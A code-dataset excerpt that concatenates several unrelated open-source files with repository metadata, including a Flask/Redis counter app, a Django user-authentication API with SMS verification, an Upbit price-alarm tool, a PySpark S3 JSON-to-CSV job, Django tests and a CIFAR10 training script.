beam_runner_api_pb2_grpc.add_TestStreamServiceServicer_to_server(
self, self._server)
self._events = events
def start(self):
self._server.start()
def stop(self):
self._server.stop(0)
self._server.wait_for_termination()
def Events(self, request, context):
"""Streams back all of the events from the streaming cache."""
for e in self._events:
yield e
| a0x8o/kafka | sdks/python/apache_beam/testing/test_stream_service.py | test_stream_service.py | py | 1,048 | python | en | code | 59 | github-code | 36 | [
{
"api_name": "apache_beam.portability.api.beam_runner_api_pb2_grpc.TestStreamServiceServicer",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "grpc.server",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "concurrent.futures.ThreadPoolExecutor",
"line_numb... |
74552228582 | """ Test File """
from flask import Flask
from redis import Redis
app = Flask(__name__)
redis_client = Redis(
host='redis_db',
port=6379
)
@app.route('/')
def hello():
"""
Main app route, simply returns a Hello
"""
count_key = redis_client.get('count')
count = int(count_key) if count_key else 0
redis_client.set('count', count+1)
return f'Hello World {count}'
if __name__ == '__main__':
app.run(host='0.0.0.0', port=int('5000'), debug=True)
| ZacharyATanenbaum/docker_dev_build_system | examples/docker_compose_services/python_docker/index.py | index.py | py | 489 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "redis.Redis",
"line_number": 7,
"usage_type": "call"
}
] |
8635132151 | # TODO :
# ElasticSearch : 검색기능 구현(DB)
# DRF Swagger(ysag) : API 문서화 작업용
# Celery(+Redis, + Naver SENS) : 문자인증을 위한 Naver SENS API 비동기 작동
# POSTMAN 설치 후 사용(DRF API Check)
import json
import os
import random
import datetime
import calendar
from django.contrib.auth import get_user_model
from django.core.exceptions import ObjectDoesNotExist
from rest_framework import generics, status
from rest_framework.authtoken.models import Token
from rest_framework.authtoken.serializers import AuthTokenSerializer
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from rest_framework.throttling import AnonRateThrottle
from rest_framework.views import APIView
import requests
from tables.models import TableLog
from .serializers import UserSerializer, PhoneNumberVerificationSerializer, CheckUniqueIDSerializer, \
SocialAuthTokenSerializer
User = get_user_model()
class SignupView(generics.CreateAPIView):
'''
회원가입 API.
아래 4개 필수 항목을 입력해 전달하면, 타입 유효성 검사 후 가입 처리
'username',
'password',
'name',
'phone_number'
나머지는 기입하지 않더라도 디폴트값 혹은 Null값 입력
'''
queryset = User.objects.all()
serializer_class = UserSerializer
def perform_create(self, serializer):
instance = serializer.save()
instance.set_password(instance.password)
instance.save()
date_range = [
datetime.date.today().replace(day=1) + datetime.timedelta(i)
for i in range(0, calendar.monthrange(datetime.date.today().year, datetime.date.today().month)[1])
]
for date in date_range:
for time in ['Breakfast', 'Lunch', 'Dinner', 'Snack']:
TableLog.objects.get_or_create(user=User.objects.get(pk=instance.pk), date=date, time=time)
class CheckUniqueIDView(APIView):
'''
유저 ID 중복검사를 위한 View
validation 과정에서 입력한 ID가 이미 존재하는지 체크
"unique_id" : True / False 를 리턴한다.
'''
def post(self, request):
serializer = CheckUniqueIDSerializer(data=request.data)
if serializer.is_valid():
return Response({
"unique_id": True,
"message": "사용 가능한 아이디입니다."
}, status=status.HTTP_200_OK)
return Response({
"unique_id": False,
"message": "이미 존재하는 아이디입니다."
}, status=status.HTTP_200_OK)
root_dir = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
secrets = json.load(open(os.path.join(os.path.join(root_dir, '.secrets'), 'base.json')))
class PhoneNumberVerificationView(APIView):
'''
휴대폰 번호 인증을 위한 NAVER SENS API 연동
휴대폰 번호를 전달하면 정규식 검증(10-11자리 숫자로 이루어진 문자열 여부 확인, - 제외)
유효한 형식임이 확인되면 NAVER SENS를 통해 입력된 번호로 랜덤 인증번호(1000~9999 사이) 발송
발송에 성공한 경우 {"verifiation" : <인증번호> , "message" : <인증 성공>} 전달
실패했을 경우 {"verification" : False, "message" : <인증 실패> 전달
'''
# throttle classes : 익명 유저의 verification 신청 횟수 제한
throttle_classes = (AnonRateThrottle,)
def post(self, request):
serializer = PhoneNumberVerificationSerializer(data=request.data)
if serializer.is_valid():
service_id = secrets['SENS_SERVICE_ID']
random_num = str(random.randrange(1000, 9999))
send_url = f'https://api-sens.ncloud.com/v1/sms/services/{service_id}/messages'
headers = {
"Content-Type": "application/json; charset=utf-8",
"X-NCP-auth-key": secrets['X-NCP-AUTH-KEY'],
"X-NCP-service-secret": secrets['X-NCP-SERVICE-SECRET']
}
body = {
"type": "SMS",
"from": secrets['FROM_PHONE_NUMBER'],
"to": [
serializer.data['phone_number']
],
"content": "인증번호는 " + random_num + "입니다."
}
res = requests.post(send_url, headers=headers, data=json.dumps(body))
if not res.json()['status'] == '200':
return Response({"verification": False, "verificationNumber": "", "message": "인증번호 발송에 실패했습니다."},
status=status.HTTP_400_BAD_REQUEST)
return Response({"verification": True, "verificationNumber": random_num, "message": "인증번호가 발송되었습니다."},
status=status.HTTP_202_ACCEPTED)
class AuthTokenView(APIView):
'''
Login View.
Post 요청으로 username, password를 받아
serializer에서 사용자인증(authenticate)에 성공하면
해당 사용자와 연결된 토큰 정보를 리턴하거나 없다면 새로 생성한다.
'''
def post(self, request):
serializer = AuthTokenSerializer(data=request.data)
if serializer.is_valid():
user = serializer.validated_data['user']
token, created = Token.objects.get_or_create(user=user)
return Response({"token": token.key}, status=status.HTTP_200_OK)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class SocialAuthTokenView(APIView):
'''
Social Login View.
Post 요청으로 iOS-SNS API 통신으로 전달받은 user_id를 확인하여
이미 있던 계정이면 그에 해당하는 토큰을, 없다면 새롭게 토큰을 생성한다.
'''
def post(self, request):
serializer = SocialAuthTokenSerializer(data=request.data)
if serializer.is_valid():
token, created = Token.objects.get_or_create(user=serializer.user)[0]
return Response({"token": token.key}, status=status.HTTP_200_OK)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class LogoutView(APIView):
'''
로그아웃 View. 유저에 할당되었던 토큰을 삭제해준다.
delete method로 request를 요청해야함
유저가 토큰을 가지고 있을 경우에만 접근 가능(IsAuthenticated)
'''
permission_classes = (IsAuthenticated,)
def delete(self, request):
try:
request.user.auth_token.delete()
except (AttributeError, ObjectDoesNotExist):
return Response({"logout": True, "message": "이미 로그아웃 처리되었습니다."},
status=status.HTTP_204_NO_CONTENT)
return Response({"logout": True}, status=status.HTTP_200_OK)
class UserProfileView(generics.RetrieveUpdateAPIView):
permission_classes = (IsAuthenticated,)
queryset = User.objects.all()
serializer_class = UserSerializer
# members/profile/로 받기 때문에, pk가 추가 인자로 들어오지 않는다.
# 따라서 lookup_urlkwarg / lookup_field > 기본값 "pk"가 주어지지 않은 경우
# request.user를 선택하여 리턴하도록 한다.
def get_object(self):
lookup_url_kwarg = self.lookup_url_kwarg or self.lookup_field
if lookup_url_kwarg not in self.kwargs:
return self.request.user
# method for creating password hashing relation
def perform_update(self, serializer):
super(UserProfileView, self).perform_update(serializer)
instance = serializer.save()
instance.set_password(instance.password)
instance.save()
| hanoul1124/healthcare2 | app/members/apis.py | apis.py | py | 7,757 | python | ko | code | 0 | github-code | 36 | [
{
"api_name": "django.contrib.auth.get_user_model",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "rest_framework.generics.CreateAPIView",
"line_number": 29,
"usage_type": "attribute"
},
{
"api_name": "rest_framework.generics",
"line_number": 29,
"usage_type": ... |
8562919260 | import time
import threading
import json
import datetime
from collections import deque
import ctypes
import os
import UpbitWrapper
from playsound import playsound
ALARM_SWITCH = True
SOUND_SWITCH = True
def tdstr(td):
days = ""
hours = ""
minutes = ""
seconds = "0"
ms = ""
if td.days != 0:
days = f"{td.days}일 "
if td.seconds // 3600 != 0:
hours = f"{td.seconds // 3600}시간 "
if (td.seconds % 3600) // 60 != 0:
minutes = f"{(td.seconds % 3600) // 60:0>2d}분 "
if td.seconds % 60 != 0:
seconds = f"{td.seconds % 60}"
if td.microseconds != 0:
ms = f".{td.microseconds:1.0f}"
return days + hours + minutes + seconds + ms + "초"
class Ticker:
def __init__(self, market_name, market_cap, price, timestamp):
self.market_name = market_name
self.market_cap = market_cap
self.price = price
self.timestamp = timestamp
class MarketMonitor:
def __init__(self, change, market, interval, cooldown):
self.market_code = market
self.change = change
self.interval = interval
self.cooldown = cooldown
self.container = deque()
self.is_active = True
self.time_disabled = 0
def state_report(self):
print('---------------')
print(f"is_active: {self.is_active}")
print(f"ALARM_SWITCH: {ALARM_SWITCH}")
print(f"num_item: {len(self.container)}")
#for i in range(len(self.container)):
# print(f"price: {self.container[i].price} time: {self.container[i].timestamp}")
print('---------------')
def update_ticker(self, item):
# self.state_report()
# print(f"newcomer: {item.timestamp}")
# restore alarm if disabled
if self.is_active == False:
alarm_checked = False
timestamp_now = datetime.datetime.now().timestamp()
if self.time_disabled + self.cooldown < timestamp_now:
self.is_active = True
# add an item
idx = 0
if len(self.container) == 0:
self.container.append(item)
return None
while idx < len(self.container) and \
self.container[idx].timestamp >= item.timestamp:
# print(f"<<comparing {self.container[idx].timestamp} and {item.timestamp}")
if self.container[idx].timestamp == item.timestamp:
return None
idx += 1
if idx == len(self.container):
self.container.append(item)
else:
self.container.insert(idx, item)
# determine the newest
first = self.container.popleft()
self.container.appendleft(first)
# determine the last
last = self.container.pop()
if last.timestamp + self.interval > first.timestamp:
self.container.append(last)
return None
# determine the last outranged
outranged = last
while last.timestamp + self.interval < item.timestamp and \
last != item:
outranged = last
last = self.container.pop()
self.container.append(last)
true_interval = item.timestamp - outranged.timestamp
true_change = (item.price - outranged.price) / item.price
# if satisfies condition, send off an alarm
if abs(true_change) > self.change and true_change * self.change > 0 and self.is_active:
self.time_disabled = datetime.datetime.now().timestamp()
self.is_active = False
return Alarm(first.timestamp, self.market_code, first.market_name, 0, true_change, true_interval)
class Alarm:
    """Human-readable alert describing a price change on one market.

    NOTE(review): relies on the module-level ``tdstr`` helper and the
    ``datetime`` import defined elsewhere in this file.
    """

    def __init__(self, time, market_code, market_name, market_cap, d_ratio, d_time):
        self.time = time
        pieces = [
            market_name + "(" + market_code + "): ",
            "지난 " + tdstr(datetime.timedelta(seconds=d_time)) + " 동안",
            f"{d_ratio * 100:.3f}% 변화했습니다\n",
            f"현재 시간은 {datetime.datetime.fromtimestamp(time)} 입니다",
        ]
        self.text = "".join(pieces)

    def __str__(self):
        return self.text
class Criteria:
    """One alarm rule: fire when a market moves by ``d_ratio`` within ``d_time``.

    Keeps one MarketMonitor per market code and fans incoming tickers out
    to them.
    """

    def __init__(self, cid, d_ratio, d_time, cooldown):
        self.cid = cid              # unique id handed out by Monitor.add_criteria
        self.d_ratio = d_ratio      # fractional change threshold (e.g. 0.05 == 5%)
        self.d_time = d_time        # observation window, seconds
        self.cooldown = cooldown    # mute period after a market fires, seconds
        self.monitor_dict = {}      # market code -> MarketMonitor

    def add_monitor(self, new_market):
        """Create and register a MarketMonitor for ``new_market``."""
        new_monitor = MarketMonitor(self.d_ratio, new_market, self.d_time, self.cooldown)
        self.monitor_dict[new_market] = new_monitor

    def update_monitors(self, new_items):
        """Feed each ticker in ``new_items`` (market code -> Ticker) to its
        monitor, creating monitors on first sight; return any raised Alarms."""
        alarms = []
        for market, item in new_items.items():
            if market not in self.monitor_dict:  # idiom: no .keys() needed
                self.add_monitor(market)
            ret = self.monitor_dict[market].update_ticker(item)
            if ret is not None:  # identity check for None, not ``!=``
                alarms.append(ret)
        return alarms
class Monitor:
    """Owns all alarm criteria, polls the exchange, and dispatches alerts.

    Thread-safety: three independent locks guard the criteria list, the
    message inbox, and the popup-window counter, because the polling timer
    runs on background threads while the console UI reads the same state.
    """

    def __init__(self):
        self.criteria_id = 1               # next id handed out by add_criteria
        self.criteria = []                 # registered Criteria rules
        self.criteria_lock = threading.Lock()
        self.message = deque()             # alarm history, kept sorted by time
        self.message_lock = threading.Lock()
        self.alarm_window_num = 0          # currently-open popup windows
        self.alarm_window_lock = threading.Lock()

    def update_messages(self, new_messages):
        """Insert ``new_messages`` into the time-sorted inbox, then prune.

        Messages are inserted in ascending ``time`` order via linear scan.
        """
        self.message_lock.acquire(blocking=True)
        for msg in new_messages:
            # linear insertion keeps the deque ordered by ascending time
            idx = 0
            while idx < len(self.message) and msg.time >= self.message[idx].time:
                idx += 1
            if idx == len(self.message):
                self.message.append(msg)
            else:
                self.message.insert(idx, msg)
        if len(self.message) < 1:
            self.message_lock.release()
            return
        # peek at the oldest (leftmost) entry without removing it
        first = self.message.popleft()
        self.message.appendleft(first)
        # NOTE(review): pops from the newest end until an entry is within
        # 86400 s (24 h) of ``first`` -- presumably pruning stale messages,
        # but comparing newest against oldest+24h rarely discards anything;
        # confirm the intended retention rule against callers.
        while len(self.message) > 0:
            last = self.message.pop()
            if last.time + 86400 > first.time:
                self.message.append(last)
                break
        self.message_lock.release()

    def alarm_thread_func(self, alarm):
        """Worker body for one alarm: optional sound plus a blocking Windows
        message box (skipped when alarms are muted or >10 popups are open)."""
        if SOUND_SWITCH:
            playsound('./alarm.wav')
        # NOTE(review): alarm_window_num is read here without holding its lock
        if not ALARM_SWITCH or self.alarm_window_num > 10:
            return
        self.alarm_window_lock.acquire(blocking=True)
        self.alarm_window_num += 1
        self.alarm_window_lock.release()
        # blocks this worker thread until the user closes the popup (Windows only)
        ctypes.windll.user32.MessageBoxW(0, alarm.text, "알림", 0)
        self.alarm_window_lock.acquire(blocking=True)
        self.alarm_window_num -= 1
        self.alarm_window_lock.release()

    def send_alarm(self, alarm):
        """Fire-and-forget: show ``alarm`` on a fresh thread so polling never blocks."""
        threading.Thread(target=Monitor.alarm_thread_func, args=(self, alarm)).start()

    def _monitor(self):
        """One polling pass: fetch tickers, run every criterion, store and
        dispatch any resulting alarms."""
        new_messages = []
        markets = UpbitWrapper.get_all_markets()
        if markets == None:  # NOTE(review): ``is None`` preferred
            return
        r_dict = UpbitWrapper.get_tickers(markets)
        if r_dict == None:
            return
        market_tickers = {} # dict, key: market code
        for market in r_dict:
            # only KRW-quoted markets are monitored
            if "KRW" not in market['market']:
                continue
            cur_price = market['trade_price']
            timestamp = market['timestamp'] / 1e3  # exchange reports milliseconds
            item = Ticker(markets[market['market']], 0, cur_price, timestamp)
            market_tickers[market['market']] = item
        self.criteria_lock.acquire(blocking=True)
        for criterion in self.criteria:
            new_messages.extend(criterion.update_monitors(market_tickers))
        self.criteria_lock.release()
        self.update_messages(new_messages)
        for msg in new_messages:
            self.send_alarm(msg)
        return

    def _monitor_wrapper(self):
        """Run one pass, then re-arm a 50 ms timer for the next pass."""
        self._monitor()
        threading.Timer(0.05, Monitor._monitor_wrapper, args=(self,)).start()

    def start(self):
        """Kick off the self-rescheduling polling loop on a background thread."""
        threading.Thread(target=Monitor._monitor_wrapper, args=(self,)).start()

    def add_criteria(self, d_ratio, d_time, cooldown):
        """Register a new alarm rule; returns the id assigned to it."""
        new_criteria = Criteria(self.criteria_id, d_ratio, d_time, cooldown)
        self.criteria_id += 1
        self.criteria_lock.acquire(blocking=True)
        self.criteria.append(new_criteria)
        self.criteria_lock.release()
        return self.criteria_id - 1

    def list_criteria(self):
        """Return a text summary of all registered alarm rules."""
        text = ""
        self.criteria_lock.acquire(blocking=True)
        for c in self.criteria:
            text += f"알람 ID: {c.cid} 변화율: {c.d_ratio * 100}% 시간 간격: {datetime.timedelta(seconds=c.d_time)} 알람 주기: {datetime.timedelta(seconds=c.cooldown)}"
        self.criteria_lock.release()
        return text

    def remove_criteria(self, cid):
        """Delete the rule with id ``cid``; True on success, False if absent."""
        i = 0
        self.criteria_lock.acquire(blocking=True)
        for i in range(len(self.criteria)):
            if self.criteria[i].cid == cid:
                self.criteria.pop(i)
                self.criteria_lock.release()
                return True
        self.criteria_lock.release()
        return False

    def list_messages(self):
        """Render the alarm inbox as a separator-delimited text dump."""
        text = ""
        self.message_lock.acquire(blocking=True)
        for item in self.message:
            text += "-----------------------------------------------\n"
            text += str(datetime.datetime.fromtimestamp(item.time)) + "\n"
            text += item.text + "\n"
        self.message_lock.release()
        return text
# ---------------------------------------------------------------------------
# Console entry point: start the background monitor, then serve a text-menu
# UI. Commands: h help, q quit, r <id> remove alarm, l list alarms,
# m message inbox, d toggle popups, s toggle sound, a add alarm.
# ---------------------------------------------------------------------------
monitor = Monitor()
monitor.start()
print("===============================")
print("환영합니다! 도움말은 h를 입력하세요")
print("주의: 알람 메세지 박스는 최신이 아닐 수 있습니다")
print("주의: m을 입력해 메세지함을 사용하세요")
print("===============================")
while True:
    print(">> ", end=' ')
    user_input = input().lower()
    if user_input == 'h':
        # NOTE(review): the original built this with backslash continuations
        # inside one literal; whitespace reconstructed as newline + space.
        help_text = ("도움말은 h를 입력하세요\n "
                     "알람 추가는 a를 입력하세요\n "
                     "알람 목록 보기는 l을 입력하세요\n "
                     "알람 삭제를 위해선 r <알람 ID>를 입력하세요 (예시: r 3)\n "
                     "전체 알람 끄기/켜기는 d을 입력하세요\n "
                     "알람 소리 끄기/켜기는 s을 입력하세요\n "
                     "메세지함은 m을 입력하세요")
        print(help_text)
    elif user_input == 'q':
        os._exit(0)
    elif user_input[:1] == 'r':
        # BUGFIX: on a parse error the original looped forever re-parsing the
        # same unchanged input; abort back to the prompt instead.
        try:
            cid = int(user_input[1:])
        except ValueError:
            print("잘못 입력하셨습니다. 처음으로 돌아갑니다.")
            continue
        # BUGFIX: success / not-found messages were swapped --
        # remove_criteria() returns True when the alarm was deleted.
        if monitor.remove_criteria(cid):
            print("알람을 성공적으로 삭제했습니다")
        else:
            print("대상 알람 ID를 찾을 수 없습니다")
    elif user_input == 'l':
        text = monitor.list_criteria()
        print(text)
    elif user_input == 'm':
        print(monitor.list_messages())
    elif user_input == 'd':
        if ALARM_SWITCH:
            ALARM_SWITCH = False
            print("모든 알람이 꺼졌습니다")
        else:
            ALARM_SWITCH = True
            print("알람이 다시 작동합니다")
    elif user_input == 's':
        if SOUND_SWITCH:
            SOUND_SWITCH = False
            print("곧 모든 소리가 꺼집니다")
        else:
            SOUND_SWITCH = True
            print("소리가 켜졌습니다")
    elif user_input == 'a':
        print("알람을 추가합니다")
        # these prompt loops re-print the prompt each iteration, so retrying
        # on bad input is safe here (unlike the 'r' handler above)
        while True:
            try:
                print("변화율을 입력하세요 (% 단위): ")
                change = float(input()) / 100
            except ValueError:
                continue
            break
        if change == 0:
            print("변화율은 0%가 될 수 없습니다. 처음으로 돌아갑니다")
            continue
        print("시간 간격을 입력하세요: 입력하신 시간 간격 동안 변화율 이상의 변화가 감지되면 알림을 내보냅니다")
        print("------------")
        minutes = sec = 0  # renamed from ``min`` to avoid shadowing the builtin
        while True:
            try:
                print("분을 입력하세요 (알림의 간격이 3일 1시간 30분 12.52초라면 30을 입력): ", end='')
                minutes = int(input())
            except ValueError:
                continue
            break
        while True:
            try:
                print("초를 입력하세요 (알림의 간격이 3일 1시간 30분 12.52초라면 12.52를 입력): ", end='')
                sec = float(input())
            except ValueError:
                continue
            break
        interval = datetime.timedelta(minutes=minutes, seconds=sec).total_seconds()
        if interval == 0:
            print("시간 간격은 0이 될 수 없습니다. 처음으로 돌아갑니다")
            continue
        print("알람 주기를 입력하세요: 알람이 울린 후 다시 울리기까지 걸리는 시간입니다")
        print("------------")
        minutes = 0
        while True:
            try:
                print("분을 입력하세요 (알림의 간격이 3일 1시간 30분 12.52초라면 30을 입력): ", end='')
                minutes = int(input())
            except ValueError:
                continue
            break
        cooldown = datetime.timedelta(minutes=minutes).total_seconds()
        if cooldown == 0:
            print("알람 주기는 0이 될 수 없습니다. 처음으로 돌아갑니다")
            continue
        cid = monitor.add_criteria(change, interval, cooldown)
        if cid > 0:
            print(f"알람이 성공적으로 추가됐습니다. 알람 ID: <{cid}>")
| livelykitten/Coinwork | Document1.py | Document1.py | py | 11,579 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "collections.deque",
"line_number": 47,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.now",
"line_number": 68,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 68,
"usage_type": "attribute"
},
{
"api_name": "dateti... |
24684070432 | # -*- coding: utf-8 -*-
"""
Created on Sat Aug 3 12:48:55 2019
@author: sudesh.amarnath
"""
import boto3
import os
import glob
import findspark
findspark.init('/home/ubuntu/spark-2.1.1-bin-hadoop2.7')
import pyspark
from pyspark.sql import SparkSession
spark = SparkSession.builder.appName('test').getOrCreate()
from pyspark.sql.functions import concat_ws,concat,lit,Column,regexp_replace
def upload_file(file_name, bucket, object_name=None):
    """Upload ``file_name`` to the given S3 ``bucket``.

    When ``object_name`` is omitted the local file name is reused as the
    S3 object key. Returns None.
    """
    key = file_name if object_name is None else object_name
    client = boto3.client('s3')
    client.upload_file(file_name, bucket, key)
s3 = boto3.resource('s3')
my_bucket = s3.Bucket('sudeshrandom')
for file in my_bucket.objects.all():
if ".json" in file.key:
file_name=file.key
fname=file_name.replace('new/','')
with open(fname,'w') as f:
wfile_path='/home/ubuntu/processed/'+fname.replace('.json','')
obj = my_bucket.Object(file.key)
f.write(obj.get()['Body'].read().decode('utf-8'))
df= spark.read.option("multiLine", "true").json(fname)
df.select(concat_ws("",df['info.seed']).alias("id"),\
concat(concat_ws("",df['results.name.first']),lit(' '),concat_ws("",df['results.name.last'])).alias('Full_Name'),\
concat_ws("",df['results.gender']).alias("Gender"),\
concat_ws("",df['results.dob.date']).astype('date').alias("DoB"),\
concat_ws("",df['results.email']).alias("Email"),\
concat_ws("",df['results.phone']).alias("home_phone"),\
concat_ws("",df['results.cell']).alias("cell_phone"),\
concat_ws("",df['results.location.street']).alias("Street"),\
concat_ws("",df['results.location.city']).alias("City"),\
concat_ws("",df['results.location.state']).alias("State"),\
concat_ws("",df['results.nat']).alias("Country"),\
concat_ws("",df['results.location.postcode']).astype('int').alias("Postcode"),\
concat_ws("",df['results.location.coordinates.latitude']).alias("Latitude"),\
concat_ws("",df['results.location.coordinates.longitude']).alias("Longitude")
).coalesce(1).write.option("mapreduce.fileoutputcommitter.marksuccessfuljobs","false").option("header","true").csv(wfile_path)
os.remove(fname)
for s3_file in glob.glob(wfile_path+'/*.csv'):
cname='processed/'+fname.replace('.json','.csv')
upload_file(s3_file,'sudeshrandom',cname)
| sudeshg46/Phoenix | json_csv_extractor.py | json_csv_extractor.py | py | 2,733 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "findspark.init",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "pyspark.sql.SparkSession.builder.appName",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "pyspark.sql.SparkSession.builder",
"line_number": 15,
"usage_type": "attribute"
... |
31414321307 | import datetime
import json
from .base_test import BaseTestCase, LoggedActivity
class EditLoggedActivityTestCase(BaseTestCase):
"""Edit activity test cases."""
def setUp(self):
"""Inherit parent tests setUp."""
super().setUp()
# add tests logged activity and corresponding activity
self.alibaba_ai_challenge.save()
self.log_alibaba_challenge.save()
self.js_meet_up.save()
self.payload = dict(
description="Participated in that event",
activityId=self.js_meet_up.uuid
)
def test_edit_logged_activity_is_successful(self):
"""Test that editing a logged activity does not fail."""
response = self.client.put(
f'/api/v1/logged-activities/{self.log_alibaba_challenge.uuid}',
data=json.dumps(self.payload), headers=self.header
)
self.assertEqual(response.status_code, 200)
message = 'Activity edited successfully'
self.assertEqual(
json.loads(response.get_data(as_text=True))['message'], message
)
edited_activity = LoggedActivity.query.get(
self.log_alibaba_challenge.uuid
)
self.assertEqual(edited_activity.activity_id, self.js_meet_up.uuid)
def test_edit_logged_activity_by_non_owner_is_unsuccessful(self):
"""
Test that editing a logged activity that
doesn't belong to you fails.
"""
self.header["Authorization"] = self.generate_token(
self.test_user2_payload
)
response = self.client.put(
f'/api/v1/logged-activities/{self.log_alibaba_challenge.uuid}',
data=json.dumps(self.payload), headers=self.header
)
self.assertEqual(response.status_code, 404)
def test_edit_logged_activity_that_is_no_longer_pending(self):
"""
Test that editing a logged activity that has been approved or rejected
fails.
"""
self.log_alibaba_challenge.status = 'approved'
self.alibaba_ai_challenge.save()
response = self.client.put(
f'/api/v1/logged-activities/{self.log_alibaba_challenge.uuid}',
data=json.dumps(self.payload), headers=self.header
)
self.assertEqual(response.status_code, 401)
def test_edit_logged_activity_parser_works(self):
"""
Test that during editing a logged activity, the marshamallow result
parser works the same way it does while logging an activity.
"""
self.js_meet_up.activity_date = datetime.date.today() - \
datetime.timedelta(days=31)
self.js_meet_up.save()
response = self.client.put(
f'/api/v1/logged-activities/{self.log_alibaba_challenge.uuid}',
data=json.dumps(self.payload), headers=self.header
)
self.assertEqual(response.status_code, 422)
message = 'You\'re late. That activity happened more than 30 days ago'
self.assertEqual(
json.loads(response.get_data(as_text=True))['message'], message
)
self.payload['activityId'] = 'invalid_activity_id'
response = self.client.put(
f'/api/v1/logged-activities/{self.log_alibaba_challenge.uuid}',
data=json.dumps(self.payload), headers=self.header
)
self.assertEqual(response.status_code, 422)
message = 'Invalid activity id'
self.assertEqual(
json.loads(response.get_data(as_text=True))['message'], message
)
def test_edit_logged_activity_validation_works(self):
"""
Test that during editing a logged activity, validation via marshmallow
works the same way it does while logging an activity.
"""
self.payload['activityTypeId'] = 'blah blah'
response = self.client.put(
f'/api/v1/logged-activities/{self.log_alibaba_challenge.uuid}',
data=json.dumps(self.payload), headers=self.header
)
self.assertEqual(response.status_code, 400)
def test_secretary_edit_logged_activity_works(self):
"""Test secretaty can change status to pending."""
payload = {'status': 'pending'}
uuid = self.log_alibaba_challenge.uuid
response = self.client.put(
f'/api/v1/logged-activities/review/{uuid}',
data=json.dumps(payload),
headers=self.society_secretary
)
response_payload = json.loads(response.data)
self.assertEqual(response_payload.get('data').get('status'),
payload.get('status'))
self.assertEqual(response.status_code, 200)
def test_secretary_edit_reject_activity_works(self):
"""Test secretary can change status to rejected."""
payload = {'status': 'rejected'}
uuid = self.log_alibaba_challenge.uuid
response = self.client.put(
f'/api/v1/logged-activities/review/{uuid}',
data=json.dumps(payload),
headers=self.society_secretary
)
response_payload = json.loads(response.data)
self.assertEqual(response_payload.get('data').get('status'),
payload.get('status'))
self.assertEqual(response.status_code, 200)
def test_secretary_edit_invalid_input(self):
"""Test invalid input is rejected."""
payload = {'status': 'invalid'}
uuid = self.log_alibaba_challenge.uuid
response = self.client.put(
f'/api/v1/logged-activities/review/{uuid}',
data=json.dumps(payload),
headers=self.society_secretary
)
self.assertEqual(response.status_code, 400)
def test_secretary_edit_non_existent_logged_activity(self):
"""Test edit non-existent activity returns 404"""
payload = {'status': 'invalid'}
response = self.client.put(
'/api/v1/logged-activities/review/-KlHerwfafcvavefa',
data=json.dumps(payload),
headers=self.society_secretary
)
response_payload = json.loads(response.data)
self.assertEqual(response_payload.get('message'),
'Logged activity not found')
self.assertEqual(response.status_code, 404)
def test_secretary_edit_logged_activity_empty_payload(self):
"""Test edit activity with empty payload returns 400"""
payload = {}
response = self.client.put(
'/api/v1/logged-activities/review/-KlHerwfafcvavefa',
data=json.dumps(payload),
headers=self.society_secretary
)
response_payload = json.loads(response.data)
self.assertEqual(response_payload.get('message'),
'status is required.')
self.assertEqual(response.status_code, 400)
| andela/andela-societies-backend | src/tests/test_edit_logged_activity.py | test_edit_logged_activity.py | py | 6,852 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "base_test.BaseTestCase",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "json.dumps",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "json.loads",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "base_test.LoggedActivity.... |
40393533142 | #!/usr/bin/env python
import argparse
import random
import numpy as np
import pandas as pd
from pathlib import Path
import torch
from torch import optim
from torch import nn
from torch import cuda
import torchvision
from uniform_augment import ImageTransform
from model import load_model
from train import train_model
from utils import visualize_logs
random.seed(123)
np.random.seed(123)
torch.manual_seed(123)
parser = argparse.ArgumentParser()
parser.add_argument('base_dir', type=str)
parser.add_argument('model', type=str)
parser.add_argument('--num_epochs', default=100, type=int)
parser.add_argument('--early_stopping', action='store_true')
args = parser.parse_args()
# Loading and normalizing CIFAR10
size = 224
mean = (0.485, 0.456, 0.406)
std = (0.229, 0.224, 0.225)
transform_train = ImageTransform(size, mean, std, train=True)
transform_test = ImageTransform(size, mean, std, train=False)
dataset_train = torchvision.datasets.CIFAR10(root=args.base_dir, train=True, download=True, transform=transform_train)
dataset_test = torchvision.datasets.CIFAR10(root=args.base_dir, train=False, download=True, transform=transform_test)
# Setting parameters
LEARNING_RATE = 1e-3
BATCH_SIZE = 32
device = 'cuda' if cuda.is_available() else 'cpu'
print(f'device: {device}')
# Loading a pretrained model
net = load_model(args.model, 10)
# Defining a loss function
criterion = nn.CrossEntropyLoss()
# Defining an optimizer
optimizer = optim.SGD(net.parameters(), lr=LEARNING_RATE, momentum=0.9)
# Training the network
torch.backends.cudnn.benchmark = True
print(f'model: {args.model}')
log = train_model(args.model,
dataset_train,
dataset_test,
BATCH_SIZE,
net,
criterion,
optimizer,
args.num_epochs,
args.base_dir,
device=device,
early_stopping=args.early_stopping)
# Visualizing logs
visualize_logs(log, Path(args.base_dir, f'train_log_{args.model}.png'))
| yamaru12345/UniformAugment | main.py | main.py | py | 2,045 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "random.seed",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "numpy.random.seed",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "torch.manual_seed",
... |
70955306664 | """ Tests for scramble generation background tasks. """
from unittest.mock import Mock, patch, call
import pytest
from huey.exceptions import TaskException
from cubersio.tasks import huey
from cubersio.tasks.scramble_generation import check_scramble_pool, ScramblePoolTopOffInfo, top_off_scramble_pool
